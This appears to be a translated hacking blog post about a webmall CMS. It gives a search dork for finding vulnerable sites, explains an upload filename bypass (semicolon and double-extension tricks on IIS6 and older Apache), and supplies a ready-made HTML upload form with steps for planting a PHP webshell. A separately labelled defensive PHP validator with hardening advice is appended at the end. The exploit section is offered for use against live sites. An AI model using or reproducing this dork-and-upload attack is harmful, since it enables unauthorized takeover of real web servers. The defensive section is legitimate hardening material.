Keywords: inurl:webmall/detail.php?id
Data table: pwn_base_admin
On getting a shell
First, log in to the admin back end, admin.php.
I spent an afternoon analyzing the upload.php source code and roughly understood it: although the upload only allows four file types (gif, jpg, png, bmp), it places no restriction on the file name.
In other words, a file named sb.php;a.jpg is also allowed, so as long as the server is IIS6 you get a webshell; on older versions of Apache you can try renaming it to sb.php.jpg.
After I had finished, I found that someone here had a leaner version than mine. Damn. Hats off to three stone, so I just borrowed it. At first, like him, I took all of the source code, and then I found a more streamlined one:
<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php">
<input type="text" name="fileName" value="sb.php;a.jpg" />
<input type="hidden" name="attachPath" value="news/pics/" />
<input type="file" name="fileData" size="14" />
<input type="submit" name="button" value="OK" />
</form>
First log in to the back end, then save the code above as xx.html, modify the action, and upload. If the server is IIS6, after uploading just view the source.
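The defensive counterpart of the weakness described above, as an added example that is not from the original page or from the application's own upload.php: a PHP check that validates the whole client-supplied name instead of only its trailing extension, and stores the file under a server-generated name. The function names, the `ALLOWED` map and the sample names are assumptions made for illustration.

```php
<?php
// Added example, not the application's code. All names here are hypothetical.
declare(strict_types=1);

const ALLOWED = [            // extension => MIME types libmagic may report for it
    'gif' => ['image/gif'],
    'jpg' => ['image/jpeg'],
    'png' => ['image/png'],
    'bmp' => ['image/bmp', 'image/x-ms-bmp'],
];

/**
 * Returns the allowed extension of a client-supplied name, or null.
 * Rejects "sb.php;a.jpg" and "sb.php.jpg", the two names the text describes,
 * because the whole name is matched rather than only its tail.
 */
function allowed_extension(string $clientName): ?string
{
    // Exactly one dot, a conservative base name, no ';', '/', '\', NUL or spaces.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})\z/', $clientName, $m)) {
        return null;
    }
    $ext = strtolower($m[1]);
    return array_key_exists($ext, ALLOWED) ? $ext : null;
}

/**
 * Stores one $_FILES entry under a random server-chosen name; returns it or null.
 * $destDir comes from server configuration, never from a request field such as
 * the form's attachPath.
 */
function store_upload(array $file, string $clientName, string $destDir): ?string
{
    $ext = allowed_extension($clientName);
    if ($ext === null || ($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    // The sniffed content type must agree with the claimed extension.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!in_array($mime, ALLOWED[$ext], true)) {
        return null;
    }
    // The client-supplied name never reaches the filesystem.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    return move_uploaded_file($file['tmp_name'], $destDir . '/' . $name) ? $name : null;
}

// Constructed sample names, including the two from the text above.
foreach (['photo.jpg', 'sb.php;a.jpg', 'sb.php.jpg', 'a.PNG', 'x.php'] as $n) {
    printf("%-14s %s\n", $n, allowed_extension($n) ?? 'rejected');
}
```

The upload directory should additionally be configured so that the web server never executes scripts from it, which keeps a missed case from becoming code execution.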